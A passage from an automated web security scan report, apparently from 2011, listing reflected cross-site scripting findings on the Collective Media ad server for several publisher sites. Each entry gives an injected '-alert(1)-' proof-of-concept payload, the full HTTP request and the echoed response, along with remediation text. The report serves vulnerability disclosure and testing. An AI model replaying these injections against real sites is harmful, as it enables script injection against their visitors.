var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
wMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?62ff5'-alert(1)-'fb180e95c54;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.23. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4fe'-alert(1)-'d04fa8fb066 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly1a4fe'-alert(1)-'d04fa8fb066/news;sz=300x600;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Tue, 10 May 2011 13:12:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:12:04 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly1a4fe'-alert(1)-'d04fa8fb066/news;sz=300x600;net=q1;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.24. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db2fd'-alert(1)-'2cf845b2eaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly/newsdb2fd'-alert(1)-'2cf845b2eaf;sz=300x600;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Tue, 10 May 2011 13:12:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:12:04 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly/newsdb2fd'-alert(1)-'2cf845b2eaf;sz=300x600;net=q1;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.25. http://a.collective-media.net/adj/q1.philly/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2759'-alert(1)-'b82ad2e7b8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly/news;sz=300x600;click0=;ord=[timestamp]?&a2759'-alert(1)-'b82ad2e7b8a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Tue, 10 May 2011 13:12:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:12:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly/news;sz=300x600;net=q1;ord=[timestamp]?&a2759'-alert(1)-'b82ad2e7b8a=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.26. http://a.collective-media.net/adj/q1.philly/news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.philly/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49fd3'-alert(1)-'bb8c0ffea4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.philly/news;sz=300x600;click0=;ord=[timestamp]?49fd3'-alert(1)-'bb8c0ffea4 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Tue, 10 May 2011 13:11:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:11:53 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.philly/news;sz=300x600;net=q1;ord=[timestamp]?49fd3'-alert(1)-'bb8c0ffea4;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.27. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ab13'-alert(1)-'26d95cab4f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj6ab13'-alert(1)-'26d95cab4f8/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;env=ifr;ord1=16658;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:27 GMT
Connection: close
Content-Length: 8137

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-73310115_1305034587","http://ad.doubleclick.net/adj6ab13'-alert(1)-'26d95cab4f8/idgt.slashgear/article_above;net=idgt;u=,idgt-73310115_1305034587,11f8f328940989e,gadgets,am.h-am.b-idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_
...[SNIP]...

4.28. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29249'-alert(1)-'3aa29f3287c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.slashgear29249'-alert(1)-'3aa29f3287c/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;env=ifr;ord1=16658;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:31 GMT
Connection: close
Content-Length: 8129

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-55280407_1305034591","http://ad.doubleclick.net/adj/idgt.slashgear29249'-alert(1)-'3aa29f3287c/article_above;net=idgt;u=,idgt-55280407_1305034591,11f8f328940989e,gadgets,am.h-am.b-idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm
...[SNIP]...

4.29. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23043'-alert(1)-'d52c1947d03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.slashgear/article_above23043'-alert(1)-'d52c1947d03;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;env=ifr;ord1=16658;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:34 GMT
Connection: close
Content-Length: 8129

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-43379423_1305034594","http://ad.doubleclick.net/adj/idgt.slashgear/article_above23043'-alert(1)-'d52c1947d03;net=idgt;u=,idgt-43379423_1305034594,11f8f328940989e,gadgets,am.h-am.b-idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sec
...[SNIP]...

4.30. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [sec parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.slashgear/article_above

Issue detail

The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca6d'-alert(1)-'f7490aa7e07 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.slashgear/article_above;sec=4ca6d'-alert(1)-'f7490aa7e07 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:41 GMT
Connection: close
Content-Length: 8008

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
rticle_above;net=idgt;u=,idgt-26242497_1305034541,11f8f328940989e,none,idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sec=4ca6d'-alert(1)-'f7490aa7e07;contx=none;dc=w;btg=idgt.careers_l;btg=idgt.gadgets_h;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h;btg=cm.sports_h?","
...[SNIP]...

4.31. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2e03'-alert(1)-'6bcda574138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjf2e03'-alert(1)-'6bcda574138/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;ord1=196261;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:58 GMT
Connection: close
Content-Length: 7419

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-75558289_1305034498","http://ad.doubleclick.net/adjf2e03'-alert(1)-'6bcda574138/ns.androidcentral/general;net=ns;u=,ns-75558289_1305034498,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;ord1=19
...[SNIP]...

4.32. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69fde'-alert(1)-'523800c80c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral69fde'-alert(1)-'523800c80c4/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;ord1=196261;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:01 GMT
Connection: close
Content-Length: 7417

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-1735359_1305034501","http://ad.doubleclick.net/adj/ns.androidcentral69fde'-alert(1)-'523800c80c4/general;net=ns;u=,ns-1735359_1305034501,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;ord1=196261;contx=itbusmb;
...[SNIP]...

4.33. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae81e'-alert(1)-'6e077f8d62a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/generalae81e'-alert(1)-'6e077f8d62a;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;ord1=196261;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:04 GMT
Connection: close
Content-Length: 7419

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-62907342_1305034504","http://ad.doubleclick.net/adj/ns.androidcentral/generalae81e'-alert(1)-'6e077f8d62a;net=ns;u=,ns-62907342_1305034504,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;ord1=196261;contx=itbusmb;dc=w;bt
...[SNIP]...

4.34. http://a.collective-media.net/cmadj/ns.androidcentral/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e961'-alert(1)-'4ba879699ea was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/general;ppos=3e961'-alert(1)-'4ba879699ea HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
